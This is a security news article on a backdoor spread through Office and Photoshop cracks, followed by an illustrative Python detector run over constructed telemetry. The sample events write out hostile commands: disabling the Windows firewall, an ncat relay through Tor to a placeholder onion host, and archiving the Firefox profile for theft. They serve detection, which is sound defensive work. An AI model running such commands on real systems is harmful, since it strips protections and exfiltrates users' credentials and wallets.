- A new campaign is distributing a nasty backdoor through Photoshop and MS Office cracks.
- The malware can steal entire Monero wallets, as well as exfiltrate Firefox browsing data.
- Instead of downloading and executing pirated software cracks, you could be using a free-software alternative.
According to a Bitdefender report, a new type of malware attack is on the rise, spreading through software cracks for Microsoft Office and Adobe Photoshop CC, two tools that are widely used and equally widely pirated. These cracks do unlock the products in question, but they also drop a nasty backdoor onto the victim’s machine. If the victim holds a Monero wallet, the actors steal it, along with browser data and other sensitive information.
The distribution of these cracks mostly concerns the United States, India, Canada, Greece, Germany, Italy, Spain, South Africa, and the United Kingdom. We don’t know whether the actors are deliberately targeting these countries because of higher Monero ownership rates or higher piracy rates, but Bitdefender reports that they adapt their tooling quickly as their interests shift.
Some of the features of the backdoor that is dropped by the crack executables include the following:
- Data exfiltration through a BitTorrent client launched by the malware.
- Firewall deactivation to minimize interruptions during exfiltration.
- Use of Ncat to collect local files and relay them through Tor to the C2.
- Scheduling exfiltration tasks every 45 minutes.
The goal is to steal Firefox browser profile data such as history, credentials, and session cookies. These are archived with 7zip so that they reach the C2 as a single package. The second goal is to steal the local Monero wallet via the CLI client ‘monero-wallet-cli.exe’. The actors could easily add more capabilities to their backdoor, and they may do so soon.
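The behaviours listed above (firewall deactivation, Ncat relaying through Tor, 7zip archiving of the Firefox profile, launching monero-wallet-cli.exe, and a scheduled task repeating every 45 minutes) are all visible in ordinary endpoint telemetry. The following is an added example written for this article, not code from Bitdefender or from the report; it runs five heuristic rules over a handful of constructed, Sysmon-style process-creation and scheduled-task records. The field names, paths, command lines and the `c2-placeholder.onion` host are assumptions made up for the example, and the rules are illustrative heuristics rather than a vendor's signatures.

```python
"""Heuristic detection of the crack-backdoor behaviours over constructed telemetry.

Example code for this article (not Bitdefender's). Events are simplified
Sysmon-like records: kind "process" (image, cmdline, parent) or kind "task"
(Windows scheduled-task XML in task_xml, as logged by Security event 4698).
"""
import re
from dataclasses import dataclass
from pathlib import PureWindowsPath


@dataclass
class Event:
    kind: str            # "process" or "task"
    image: str = ""      # executable path of the new process
    cmdline: str = ""    # full command line of the new process
    parent: str = ""     # executable path of the parent process
    task_xml: str = ""   # task definition XML (task events only)


@dataclass
class Alert:
    rule: str
    detail: str


# Parents a human would normally launch a wallet CLI from (assumed list).
INTERACTIVE_PARENTS = {"explorer.exe", "cmd.exe", "powershell.exe", "windowsterminal.exe"}


def _name(path: str) -> str:
    """Lower-cased file name of a Windows path, usable on any OS."""
    return PureWindowsPath(path).name.lower()


def _mentions_user_dir(text: str) -> bool:
    """True if a path under a user profile appears in the text."""
    t = text.lower()
    return "\\users\\" in t or "\\appdata\\" in t


def firewall_disabled(ev: Event) -> bool:
    cmd = ev.cmdline.lower()
    return (ev.kind == "process" and _name(ev.image) == "netsh.exe"
            and "advfirewall" in cmd and "state off" in cmd)


def ncat_from_user_dir(ev: Event) -> bool:
    # Ncat dropped into a user-writable location, as a crack would do.
    return (ev.kind == "process" and _name(ev.image) in {"ncat.exe", "nc.exe"}
            and _mentions_user_dir(ev.image))


def firefox_profile_archived(ev: Event) -> bool:
    # 7zip pointed at the Firefox profile directory (history, logins, cookies).
    return (ev.kind == "process" and _name(ev.image) in {"7z.exe", "7za.exe"}
            and re.search(r"mozilla\\firefox\\profiles", ev.cmdline, re.I) is not None)


def wallet_cli_non_interactive(ev: Event) -> bool:
    # monero-wallet-cli.exe started by something other than a user's shell.
    return (ev.kind == "process" and _name(ev.image) == "monero-wallet-cli.exe"
            and _name(ev.parent) not in INTERACTIVE_PARENTS)


def task_45min_user_binary(ev: Event) -> bool:
    # Task repeating every 45 minutes that runs a binary from a user profile.
    return (ev.kind == "task" and "<Interval>PT45M</Interval>" in ev.task_xml
            and _mentions_user_dir(ev.task_xml))


RULES = [firewall_disabled, ncat_from_user_dir, firefox_profile_archived,
         wallet_cli_non_interactive, task_45min_user_binary]


def scan(events):
    """Apply every rule to every event; return one Alert per (rule, event) hit."""
    alerts = []
    for ev in events:
        for rule in RULES:
            if rule(ev):
                alerts.append(Alert(rule.__name__, ev.image or "scheduled task"))
    return alerts


# Constructed sample telemetry: five malicious-looking records, two benign ones.
DROPPER = r"C:\Users\bob\AppData\Roaming\svc\updater.exe"   # hypothetical path
SAMPLE_EVENTS = [
    Event("process", r"C:\Windows\System32\netsh.exe",
          "netsh advfirewall set allprofiles state off", DROPPER),
    Event("process", r"C:\Users\bob\AppData\Roaming\svc\ncat.exe",
          "ncat.exe --proxy 127.0.0.1:9050 --proxy-type socks5 c2-placeholder.onion 443", DROPPER),
    Event("process", r"C:\Users\bob\AppData\Roaming\svc\7z.exe",
          r'7z.exe a profile.7z "C:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\abc.default"',
          DROPPER),
    Event("process", r"C:\Program Files\Monero\monero-wallet-cli.exe",
          "monero-wallet-cli.exe --wallet-file wallet", DROPPER),
    Event("task", task_xml="<Task><Triggers><TimeTrigger><Repetition><Interval>PT45M</Interval>"
          "</Repetition></TimeTrigger></Triggers><Actions><Exec><Command>" + DROPPER +
          "</Command></Exec></Actions></Task>"),
    # Benign: the user runs the wallet CLI from a command prompt.
    Event("process", r"C:\Program Files\Monero\monero-wallet-cli.exe",
          "monero-wallet-cli.exe --wallet-file wallet", r"C:\Windows\System32\cmd.exe"),
    # Benign: hourly vendor updater installed under Program Files.
    Event("task", task_xml="<Task><Triggers><TimeTrigger><Repetition><Interval>PT1H</Interval>"
          "</Repetition></TimeTrigger></Triggers><Actions><Exec><Command>"
          r"C:\Program Files\Vendor\update.exe</Command></Exec></Actions></Task>"),
]

if __name__ == "__main__":
    for a in scan(SAMPLE_EVENTS):
        print(f"{a.rule:28s} {a.detail}")
```

Each rule on its own is noisy in a real fleet (administrators do run netsh, and plenty of people archive their profile folders), so in practice you would correlate them: several of these firing on the same host within the 45-minute cadence is a much stronger signal than any one hit, and the parent-process path in the alerts points straight at the dropped binary to pull for analysis.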
Even if the crack you just downloaded works as promised, that doesn’t mean you haven’t been infected with malware. Crooks don’t distribute these files for the greater good. If you don’t want to pay the price of legitimately purchasing these products, consider using open-source and free alternatives such as LibreOffice and GIMP. You might be surprised how capable these tools are.